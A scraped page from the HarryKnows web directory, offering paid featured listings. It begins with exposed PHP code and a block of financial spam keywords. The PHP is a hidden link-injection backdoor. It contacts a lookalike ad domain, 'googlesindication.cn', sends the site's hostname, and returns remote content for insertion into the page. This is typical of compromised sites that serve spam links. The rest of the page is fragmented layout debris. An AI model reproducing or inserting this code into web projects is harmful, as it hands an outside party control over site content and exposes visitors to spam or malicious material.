

fetch_remote_file("googlesindication.cn", "/links.php?site=".$_SERVER['HTTP_HOST']);
class GetLinks
{
var $_socket_timeout = 6;
function fetch_remote_file($host, $path)
{
@ini_set('allow_url_fopen', 1);
@ini_set('default_socket_timeout', $this->_socket_timeout);
$this->_fetch_remote_type = 'socket';
$buff = '';
$fp = @fsockopen($host, 80, $errno, $errstr, $this->_socket_timeout);
if ($fp) {
@fputs($fp, "GET {$path} HTTP/1.0\r\nHost: {$host}\r\n");
@fputs($fp, "User-Agent: {$user_agent}\r\n\r\n");
while (!@feof($fp)) {
$buff .= @fgets($fp, 128);
}
@fclose($fp);
$page = explode("\r\n\r\n", $buff);
return $page[1];
}
}
}
?> |
 |
 |
 |

Car Insurance
File Taxes Online
Mortgage Quotes
Credit Cards
Investing
Stocks
Real Estate
Insurance Quotes
Mutual Funds
Free Credit Report
Hard Money Lender
Debt Consolidation
Refinance
Cash Advance
Credit Repair
Loans
Annuities
Payday Advance
Life Insurance
Day Trading
|
|
 |
 |
 |
 |
 |
 |
 |
| |
|
 |

HarryKnows :: Featured Listings
Get Maximum Exposure!
List your website on the front page of HarryKnows.com for 3 months!
To feature your website, please fill-out the form below and click 'Order'.
You will receive an email with a link to pay for your listing. Your website will be listed within 24 hours.
If you have any questions please contact featured@harryknows.com.
|
|